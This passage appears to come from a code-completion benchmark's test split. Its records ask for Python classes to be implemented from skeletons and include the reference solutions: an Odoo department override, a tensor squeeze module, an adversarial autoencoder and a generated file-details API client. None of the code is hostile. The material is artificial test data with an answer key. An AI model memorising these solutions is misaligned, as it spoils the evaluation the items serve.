self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\nreturn ana_id", "ana_id = super(hr_department, self).write(vals)\nif self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\nreturn ana_id"], "bodies_text": "<|body_start_0|>\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_0|>\n\n<|body_start_1|>\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_1|>\n", "class_docstring": "", "class_name": "hr_department", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass hr_department:\n\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_0|>\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_0|>\n\n<|body_start_1|>\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000207", "length_bytes": 1664, "license_type": "no_license", "methods": [{"docstring": "override create function to set responsible of department's analytic account equals to department's manager", "name": "create", "signature": "def create(self, vals)"}, {"docstring": "override write function to set responsible of department's analytic account equals to department's manager", "name": "write", "signature": "def write(self, vals)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000124", "prompt": "Implement the Python class `hr_department` described below.\n\nClass description:\nImplement the hr_department class.\n\nMethod signatures and docstrings:\n- def create(self, vals): override create function to set responsible of department's analytic account equals to department's manager\n- def write(self, vals): override write function to set responsible of department's analytic account equals to department's manager", "prompted_full_text": "Implement the Python class `hr_department` described below.\n\nClass description:\nImplement the hr_department class.\n\nMethod signatures and docstrings:\n- def create(self, vals): override create function to set responsible of department's analytic account equals to department's manager\n- def write(self, vals): override write function to set responsible of department's analytic account equals to department's manager\n\n<|skeleton|>\nclass hr_department:\n\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_0|>\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_0|>\n\n<|body_start_1|>\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n<|end_body_1|>\n", "revision_id": "0b997095c260d58b026440967fea3a202bef7efb", "skeleton": "<|skeleton|>\nclass hr_department:\n\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_0|>\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class hr_department:\n def create(self, vals):\n \"\"\"override create function to set responsible of department's analytic account equals to department's manager\"\"\"\n ana_id = super(hr_department, self).create(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n\n def write(self, vals):\n \"\"\"override write function to set responsible of department's analytic account equals to department's manager\"\"\"\n ana_id = super(hr_department, self).write(vals)\n if self.manager_id.id != False and self.analytic_account_id.id != False:\n self.analytic_account_id.write({'user_id': self.manager_id.user_id.id})\n return ana_id\n", "source": "the_stack_v2_python_sparse", "source_path": "v_11/EBS-SVN/branches/common/hr_department_custom/models/hr_department.py", "source_repo": "musabahmed/baba", "split": "test", "star_events_count": 0} {"blob_id": "8bbf99349863bc26c0a81f7d18978a15d112189f", "bodies": ["input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\nassert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\nsuper(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\nself.squeeze_dim = self.config['dim']\nassert isinstance(self.squeeze_dim, list)\nself.n_input_streams = len(self.input_stream_ids)\nwhile len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])", "outputs_stream_dict = {}\nfor idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\nreturn outputs_stream_dict"], "bodies_text": "<|body_start_0|>\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n<|end_body_0|>\n\n<|body_start_1|>\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SqueezeModule", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SqueezeModule:\n\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n <|body_0|>\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n<|end_body_0|>\n\n<|body_start_1|>\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000208", "length_bytes": 2766, "license_type": "permissive", "methods": [{"docstring": "Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.", "name": "__init__", "signature": "def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str])"}, {"docstring": "Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:", "name": "compute", "signature": "def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001033", "prompt": "Implement the Python class `SqueezeModule` described below.\n\nClass description:\nImplement the SqueezeModule class.\n\nMethod signatures and docstrings:\n- def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]): Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\n- def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]: Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:", "prompted_full_text": "Implement the Python class `SqueezeModule` described below.\n\nClass description:\nImplement the SqueezeModule class.\n\nMethod signatures and docstrings:\n- def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]): Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\n- def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]: Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\n\n<|skeleton|>\nclass SqueezeModule:\n\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n <|body_0|>\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n<|end_body_0|>\n\n<|body_start_1|>\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n<|end_body_1|>\n", "revision_id": "afe22da2ac20c0d24e93b4dbd1f1ad61374d1a6c", "skeleton": "<|skeleton|>\nclass SqueezeModule:\n\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n <|body_0|>\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SqueezeModule:\n def __init__(self, id: str, config: Dict[str, object], input_stream_keys: List[str]):\n \"\"\"Squeeze input streams data (beware the batch dimension if it is equal to 1...). :param config: Dict of parameters. Expectes: - \"dim\": List of None/Tuple/List/torch.Size representing the index of the dimension to squeeze for each input stream. If multiple input streams are proposed but only one element in this list, then the list is expanded by repeating the last element.\"\"\"\n input_stream_ids = {f'input_{idx}': ik for idx, ik in enumerate(input_stream_keys)}\n assert 'dim' in config, \"SqueezeModule relies on 'dim' value.\\n Not found in config.\"\n super(SqueezeModule, self).__init__(id=id, type='SqueezeModule', config=config, input_stream_ids=input_stream_ids)\n self.squeeze_dim = self.config['dim']\n assert isinstance(self.squeeze_dim, list)\n self.n_input_streams = len(self.input_stream_ids)\n while len(self.squeeze_dim) < self.n_input_streams:\n self.squeeze_dim.append(self.squeeze_dim[-1])\n\n def compute(self, input_streams_dict: Dict[str, object]) -> Dict[str, object]:\n \"\"\"Operates on inputs_dict that is made up of referents to the available stream. Make sure that accesses to its element are non-destructive. :param input_streams_dict: dict of str and data elements that follows `self.input_stream_ids`'s keywords and are extracted from `self.input_stream_keys`-named streams. :returns: - outputs_stream_dict:\"\"\"\n outputs_stream_dict = {}\n for idx, (k, inp) in enumerate(input_streams_dict.items()):\n if self.squeeze_dim[idx] is not None:\n n_inp = inp.squeeze(dim=self.squeeze_dim[idx])\n else:\n n_inp = inp.squeeze()\n outputs_stream_dict[f'output_{idx}'] = n_inp\n return outputs_stream_dict\n", "source": "the_stack_v2_python_sparse", "source_path": "ReferentialGym/modules/squeeze_module.py", "source_repo": "mk788/ReferentialGym", "split": "test", "star_events_count": 0} {"blob_id": "e79a3e633f9654584bce9620cfc53c2815f63442", "bodies": ["super().__init__()\nself.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\nself.discriminator = discriminator_cls(latent_dim=latent_dim)\nself._latent_dim = latent_dim", "results_gen = self.generator(x)\nz = torch.randn_like(results_gen['encoded'])\nreturn {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n<|end_body_0|>\n\n<|body_start_1|>\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n<|end_body_1|>\n", "class_docstring": "Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc", "class_name": "AdversarialAutoEncoderPyTorch", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n<|end_body_0|>\n\n<|body_start_1|>\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000209", "length_bytes": 4295, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model", "name": "__init__", "signature": "def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator)"}, {"docstring": "Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002209", "prompt": "Implement the Python class `AdversarialAutoEncoderPyTorch` described below.\n\nClass description:\nClass implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\n- def forward(self, x): Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs", "prompted_full_text": "Implement the Python class `AdversarialAutoEncoderPyTorch` described below.\n\nClass description:\nClass implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\n- def forward(self, x): Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\n\n<|skeleton|>\nclass AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n<|end_body_0|>\n\n<|body_start_1|>\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n<|end_body_1|>\n", "revision_id": "1078f5030b8aac2bf022daf5fa14d66f74c3c893", "skeleton": "<|skeleton|>\nclass AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdversarialAutoEncoderPyTorch:\n \"\"\"Class implementing the Combined Adversarial Autoencoder and it's behavior during training. An adversarial autoencoder is basically aprobabilistic autoencoder that uses generative adversarial networks (GAN) to perform variational inference by matching the aggregated posterior of the hidden code vector of the autoencoder with an arbitrary prior distribution References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inferenc\"\"\"\n\n def __init__(self, latent_dim, img_shape, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the autoencoders latend dimension img_shape : tuple the shape of the input/output image generator_cls : a class implementing the actual generator model (consisting of encoder and decoder) discriminator_cls : a class implementing the actual discriminator model\"\"\"\n super().__init__()\n self.generator = generator_cls(latent_dim=latent_dim, img_shape=img_shape)\n self.discriminator = discriminator_cls(latent_dim=latent_dim)\n self._latent_dim = latent_dim\n\n def forward(self, x):\n \"\"\"Forwards a tensor through the Autoencoder and the discriminator Parameters ---------- x : :class:`torch.Tensor` the input images Returns ------- dict a dictionary containing the network's outputs\"\"\"\n results_gen = self.generator(x)\n z = torch.randn_like(results_gen['encoded'])\n return {**results_gen, 'discr_encoded': self.discriminator(results_gen['encoded']), 'discr_noise': self.discriminator(z)}\n", "source": "the_stack_v2_python_sparse", "source_path": "dlutils/models/gans/adversarial_autoencoder/aae.py", "source_repo": "justusschock/dl-utils", "split": "test", "star_events_count": 15} {"blob_id": "aabd6b0aea8fff1be5959ee22c29e20327a1a17d", "bodies": ["local_var_params = locals()\nall_params = ['wid', 'uuid']\nall_params.append('async_req')\nall_params.append('_return_http_data_only')\nall_params.append('_preload_content')\nall_params.append('_request_timeout')\nall_params.append('_accept')\nfor key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\ndel local_var_params['kwargs']\nif 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\nif 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\ncollection_formats = {}\npath_params = {}\nif 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\nif 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\nquery_params = []\nheader_params = {}\nform_params = []\nlocal_var_files = {}\nbody_params = None\nheader_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\nauth_settings = ['apiKey', 'bearer']\nreturn self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)", "local_var_params = locals()\nall_params = ['uuid']\nall_params.append('async_req')\nall_params.append('_return_http_data_only')\nall_params.append('_preload_content')\nall_params.append('_request_timeout')\nall_params.append('_accept')\nfor key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\ndel local_var_params['kwargs']\nif 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\ncollection_formats = {}\npath_params = {}\nif 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\nquery_params = []\nheader_params = {}\nform_params = []\nlocal_var_files = {}\nbody_params = None\nheader_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\nauth_settings = ['apiKey', 'bearer']\nreturn self.api_client.call_api('/data/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)"], "bodies_text": "<|body_start_0|>\n local_var_params = locals()\n all_params = ['wid', 'uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details_w\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'wid' not in local_var_params or local_var_params['wid'] is None:\n raise ValueError('Missing the required parameter `wid` when calling `workspace_file_details`')\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `workspace_file_details`')\n collection_formats = {}\n path_params = {}\n if 'wid' in local_var_params:\n path_params['wid'] = local_var_params['wid']\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', self.api_client.select_header_accept(['application/json', 'application/octet-stream', 'application/problem+json']))\n auth_settings = ['apiKey', 'bearer']\n return self.api_client.call_api('/data/workspaces/{wid}/files/{uuid}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='object', auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats)\n<|end_body_0|>\n\n<|body_start_1|>\n local_var_params = locals()\n all_params = ['uuid']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n all_params.append('_accept')\n for key, val in six.iteritems(local_var_params['kwargs']):\n if key not in all_params:\n raise TypeError(\"Got an unexpected keyword argument '%s' to method app_api_data_file_details\" % key)\n local_var_params[key] = val\n del local_var_params['kwargs']\n if 'uuid' not in local_var_params or local_var_params['uuid'] is None:\n raise ValueError('Missing the required parameter `uuid` when calling `app_api_data_file_details`')\n collection_formats = {}\n path_params = {}\n if 'uuid' in local_var_params:\n path_params['uuid'] = local_var_params['uuid']\n query_params = []\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = local_var_params.get('_accept', 